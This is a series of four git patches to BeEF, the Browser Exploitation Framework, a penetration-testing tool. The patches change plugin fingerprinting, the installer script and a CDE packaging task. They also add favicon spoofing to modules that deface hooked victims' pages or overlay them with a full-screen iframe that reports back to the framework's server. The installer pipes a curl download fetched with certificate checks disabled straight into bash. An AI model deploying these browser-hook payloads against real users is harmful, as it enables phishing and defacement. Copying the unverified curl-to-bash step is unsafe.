From 1335f57a4664876f6b836822d2c233ae5db47623 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 14 May 2012 20:29:18 +0930 Subject: [PATCH 1/4] Browser plugins are now passed through unique() --- core/main/client/browser.js | 54 +++++++++++++++++++++---------------- 1 file changed, 31 insertions(+), 23 deletions(-) diff --git a/core/main/client/browser.js b/core/main/client/browser.js index 321d5f0c4..53d6505e5 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -597,29 +597,37 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo * Returns the list of plugins installed in the browser. */ getPlugins: function() { - var results = ''; - if (this.isIE()) - { - results = this.getPluginsIE(); - } else { - if (navigator.plugins && navigator.plugins.length > 0) - { - var length = navigator.plugins.length; - for (var i=0; i < length; i++) - { - if (i != 0) - results += '\n'; - if(beef.browser.isFF()){ //FF returns exact plugin versions - results += navigator.plugins[i].name + '-v.' + navigator.plugins[i].version; - }else{ // Webkit and Presto (Opera) doesn't support the version attribute, and - // sometimes they store plugin version in description (Real, Adobe) - results += navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description; - } - } - } else { - results = 'navigator.plugins is not supported in this browser!'; - } - } + + var results; + Array.prototype.unique = function() { + var o = {}, i, l = this.length, r = []; + for(i=0; i 0) { + results = new Array(); + for (var i=0; i < navigator.plugins.length; i++) { + + // Firefox returns exact plugin versions + if (beef.browser.isFF()) results[i] = navigator.plugins[i].name + '-v.' + navigator.plugins[i].version; + + // Webkit and Presto (Opera) + // Don't support the version attribute + // Sometimes store the version in description (Real, Adobe) + else results[i] = navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description; + } + results = results.unique().toString(); + + // All browsers that don't support navigator.plugins + } else results = 'navigator.plugins is not supported in this browser!'; + + // Return results return results; }, From b9c9df93e1fd36aa15dc917fe4942a225f7f6bdc Mon Sep 17 00:00:00 2001 From: Ben Waugh Date: Tue, 15 May 2012 18:27:35 +1000 Subject: [PATCH 2/4] Updated Installer Script Improved Debian/Ubuntu installer Added Disclaimer Message/Opt Out --- install-beef | 37 ++++++++++++++++++++++++++++++------- 1 file changed, 30 insertions(+), 7 deletions(-) diff --git a/install-beef b/install-beef index 2c2401b20..2669588ff 100644 --- a/install-beef +++ b/install-beef @@ -18,6 +18,17 @@ clear echo "======================================" echo " BeEF Installer " echo "======================================" +echo "" + +echo "CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environemnt and it's dependencies." +echo "" +echo "In rare cases, this may lead to unexpected behaviour or package conflicts on some systems." +echo "" +read -p "Are you sure you wish to continue (Y/n)? " +if [ "`echo ${REPLY} | tr [:upper:] [:lower:]`" == "n" ] ; then + exit; +fi + echo "" echo "Detecting OS.."; @@ -52,7 +63,6 @@ if [ "$OS" == "Darwin" ]; then bundle install OK="yes" - cd beef ./beef echo "" @@ -69,17 +79,31 @@ if [ "$Distro" == "Debian" ]; then echo "Debian/Ubuntu Detected" echo "Installing Prerequisite Packages.." sudo apt-get update - sudo apt-get install ruby1.9.1-dev build-essential libsqlite3-ruby libsqlite3-dev build-essential libsqlite3-ruby git libsqlite3-dev rake + sudo apt-get install curl git + + + +sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion + +bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) + +echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc + +source ~/.bashrc +source $HOME/.rvm/scripts/rvm + + rvm install 1.9.2 + rvm use 1.9.2 --default echo "Downloading BeEF.." git clone git://github.com/beefproject/beef.git cd beef echo "Installing Ruby Gems" - sudo gem install bundler - sudo bundle install + gem install bundler + bundle install + - cd beef ./beef OK="yes" @@ -115,7 +139,6 @@ if [ "$Distro" == "RedHat" ]; then source ~/.bash_profile - cd beef ./beef OK="yes" @@ -128,7 +151,7 @@ if [ "$Distro" == "RedHat" ]; then fi if [ "$OK" == "yes" ]; then - +echo "" else echo "" echo "=======================================" From 594e745694aa0efc1b7e0897b0b437f50796e0b9 Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 15 May 2012 17:47:05 +0930 Subject: [PATCH 3/4] Added favicon support to deface_web_page and site_redirect_iframe modules Fixes issue #491 --- modules/browser/hooked_domain/deface_web_page/command.js | 3 +++ modules/browser/hooked_domain/deface_web_page/config.yaml | 2 +- modules/browser/hooked_domain/deface_web_page/module.rb | 4 ++++ modules/browser/hooked_domain/site_redirect_iframe/command.js | 2 ++ .../browser/hooked_domain/site_redirect_iframe/config.yaml | 2 +- modules/browser/hooked_domain/site_redirect_iframe/module.rb | 4 ++++ 6 files changed, 15 insertions(+), 2 deletions(-) diff --git a/modules/browser/hooked_domain/deface_web_page/command.js b/modules/browser/hooked_domain/deface_web_page/command.js index 1c43fa298..feff12512 100644 --- a/modules/browser/hooked_domain/deface_web_page/command.js +++ b/modules/browser/hooked_domain/deface_web_page/command.js @@ -14,7 +14,10 @@ // limitations under the License. // beef.execute(function() { + document.body.innerHTML = "<%= @deface_content %>"; + document.title = "<%= @deface_title %>"; + beef.browser.changeFavicon("<%= @deface_favicon %>"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Deface Successful"); }); diff --git a/modules/browser/hooked_domain/deface_web_page/config.yaml b/modules/browser/hooked_domain/deface_web_page/config.yaml index dad8c8070..22e8fdd4d 100644 --- a/modules/browser/hooked_domain/deface_web_page/config.yaml +++ b/modules/browser/hooked_domain/deface_web_page/config.yaml @@ -19,7 +19,7 @@ beef: enable: true category: ["Browser","Hooked Domain"] name: "Replace Content (Deface)" - description: "Overwrite the body of the page the hooked browser is on with the 'Deface Content' string." + description: "Overwrite the page, title and shortcut icon on the hooked page." authors: ["antisnatchor"] target: user_notify: ['ALL'] diff --git a/modules/browser/hooked_domain/deface_web_page/module.rb b/modules/browser/hooked_domain/deface_web_page/module.rb index d624577d8..ec5affdfc 100644 --- a/modules/browser/hooked_domain/deface_web_page/module.rb +++ b/modules/browser/hooked_domain/deface_web_page/module.rb @@ -16,7 +16,11 @@ class Deface_web_page < BeEF::Core::Command def self.options + configuration = BeEF::Core::Configuration.instance + favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico" return [ + { 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' }, + { 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' }, { 'name' => 'deface_content', 'description' => 'Your defacement content', 'ui_label'=>'Deface Content', 'type' => 'textarea', 'value' =>'BeEF!', 'width' => '400px', 'height' => '100px' } ] end diff --git a/modules/browser/hooked_domain/site_redirect_iframe/command.js b/modules/browser/hooked_domain/site_redirect_iframe/command.js index 2a0c1a59f..f707b25f7 100644 --- a/modules/browser/hooked_domain/site_redirect_iframe/command.js +++ b/modules/browser/hooked_domain/site_redirect_iframe/command.js @@ -18,6 +18,7 @@ beef.execute(function() { var result = 'Iframe successfully created!'; var title = '<%= @iframe_title %>'; var iframe_src = '<%= @iframe_src %>'; + var iframe_favicon = '<%= @iframe_favicon %>'; var sent = false; $j("iframe").remove(); @@ -25,6 +26,7 @@ beef.execute(function() { beef.dom.createIframe('fullscreen', 'get', {'src':iframe_src}, {}, function() { if(!sent) { sent = true; document.title = title; beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); } }); document.body.scroll = "no"; document.documentElement.style.overflow = 'hidden'; + beef.browser.changeFavicon(iframe_favicon); setTimeout(function() { if(!sent) { diff --git a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml index 1cc2d82bf..9e5d349c3 100644 --- a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml +++ b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml @@ -19,7 +19,7 @@ beef: enable: true category: ["Browser","Hooked Domain"] name: "Redirect Browser (iFrame)" - description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title and the time delay are specified in the parameters below.

The content of the URL bar will not be changed in the hooked browser." + description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title, page shortcut icon and the time delay are specified in the parameters below.

The content of the URL bar will not be changed in the hooked browser." authors: ["ethicalhack3r", "Yori Kvitchko"] target: user_notify: ["ALL"] diff --git a/modules/browser/hooked_domain/site_redirect_iframe/module.rb b/modules/browser/hooked_domain/site_redirect_iframe/module.rb index 9d7860f51..8ca97afa1 100644 --- a/modules/browser/hooked_domain/site_redirect_iframe/module.rb +++ b/modules/browser/hooked_domain/site_redirect_iframe/module.rb @@ -16,8 +16,12 @@ class Site_redirect_iframe < BeEF::Core::Command def self.options + configuration = BeEF::Core::Configuration.instance + favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico" return [ { 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' }, + { 'name' => 'iframe_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' }, + { 'name' => 'iframe_src', 'description' => 'Source of the iFrame', 'ui_label' => 'Redirect URL', 'value' => 'http://beefproject.com/', 'width'=>'200px' }, { 'name' => 'iframe_timeout', 'description' => 'iFrame timeout', 'ui_label' => 'Timeout', 'value' => '3500', 'width'=>'150px' } ] From f0b1d6d76fb0b508267442f6a943398edfbfab3e Mon Sep 17 00:00:00 2001 From: Ben Waugh Date: Wed, 16 May 2012 07:51:56 +1000 Subject: [PATCH 4/4] Updated CDE Generator UpdatedCan be run with: rake cde --- Rakefile | 28 +++++++++++++++++++++++++--- 1 file changed, 25 insertions(+), 3 deletions(-) diff --git a/Rakefile b/Rakefile index 4e736b699..adb1a8d14 100644 --- a/Rakefile +++ b/Rakefile @@ -165,10 +165,32 @@ task :cde do sh "make"; Dir.chdir ".."; puts "\nCreating CDE Package...\n"; - sh "./CDE/cde ruby beef"; - sleep (1); + sh "bundle install" + Rake::Task['cde_beef_start'].invoke + Rake::Task['beef_stop'].invoke puts "\nCleaning Up...\n"; - sh "rm -r CDE"; + sleep (2); + sh "rm -rf CDE"; puts "\nCDE Package Created...\n"; end +################################ +# CDE/BeEF environment set up + +@beef_process_id = nil; + +task :cde_beef_start => 'beef' do + printf "Starting CDE BeEF (wait 10 seconds)..." + @beef_process_id = IO.popen("./CDE/cde ruby beef -x 2> /dev/null", "w+") + delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05] + delays.each do |i| # delay for 10 seconds + printf '.' + sleep (i) + end + puts '.' +end + + +################################ + +